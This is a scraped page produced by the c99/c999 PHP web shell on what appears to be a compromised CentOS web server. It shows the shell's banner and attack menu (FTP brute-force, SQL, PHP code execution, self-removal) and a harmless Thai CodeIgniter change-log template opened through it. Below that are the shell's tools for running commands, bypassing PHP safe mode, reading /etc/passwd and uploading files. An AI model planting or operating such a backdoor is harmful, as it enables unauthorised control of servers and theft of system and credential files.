!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/cvc/application/views/version/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_pop_detail_qry.php (2.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div style="text-align:center;">
    <fieldset style="margin:0 auto;width:90%;">
        <legend>รายละเอียดการเปลี่ยนแปลงข้อมูล</legend>
    <?php
        
if (isset($qu_udt))
        {
            
$row $qu_udt->row();
            
$fd preg_split('/[,]/',$row->udt_tx_field_name);
            
$temp preg_replace('/[#]/','',$row->udt_tx_new_val);
            
$val preg_split('/[,]/',$temp);
            
$temp preg_replace('/[#]/','',$row->udt_tx_old_val);
            
$oval preg_split('/[,]/',$temp);
            
$len count($fd);
        }
    
?>
        <table class="ver_table" style="width:80%;">
            <caption><?php echo $row->udt_tx_describe;?></caption>
    <?php
        
switch($row->udt_tx_opt)
        {
            case 
'insert':
    
?>
            <col style="width:50%;"/>
            <col style="width:50%;"/>
            <thead>
                <tr>
                    <th>ชื่อฟิลด์</th>
                    <th>ข้อมูลที่ใส่เพิ่ม</th>
                </tr>
            </thead>
            <tbody>
                <?php
                    
for($i=0$i $len$i++)
                    {
                
?>
                <tr>
                    <td><?php echo $fd[$i];?></td>
                    <td><?php echo $val[$i];?></td>
                </tr>
                <?php
                    
}
                
?>
            </tbody>
    <?php
                
break;
            case 
'update':
    
?>
            <thead>
                <tr>
                    <th>ชื่อฟิลด์ที่แก้ไข</th>
                    <th>ข้อมูลเดิม</th>
                    <th>ข้อมูลใหม่</th>
                </tr>
            </thead>
            <tbody>
                <?php
                    
for($i=0$i $len$i++ )
                    {
                
?>
                <tr>
                    <td><?php echo $fd[$i];?></td>
                    <td><?php echo $oval[$i];?></td>
                    <td><?php echo $val[$i];?></td>
                </tr>
                <?php
                    
}
                
?>
            </tbody>
    <?php
                
break;
            case 
'delete':
    
?>
            <thead>
                <tr>
                    <th>ชื่อฟิลด์</th>
                    <th>ข้อมูลที่ลบ</th>
                </tr>
            </thead>
            <tbody>
                <?php
                    
for($i=0$i $len$i++ )
                    {
                
?>
                <tr>
                    <td><?php echo $fd[$i];?></td>
                    <td><?php echo $oval[$i];?></td>
                </tr>
                <?php
                    
}
                
?>
            </tbody>
    <?php
                
break;
            case 
'special':
                echo 
'specical';
    
?>
            <thead>
                <tr>
                    <th>สคริปต์คำสั่ง</th>
                </tr>
            </thead>
            <tbody>
                <tr>
                    <td><?php echo preg_replace('/[@@]/',' ',$row->udt_tx_old_val);?></td>
                </tr>
            </tbody>
    <?php
                
break;
        }
    
?>
        </table>
    </fieldset>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--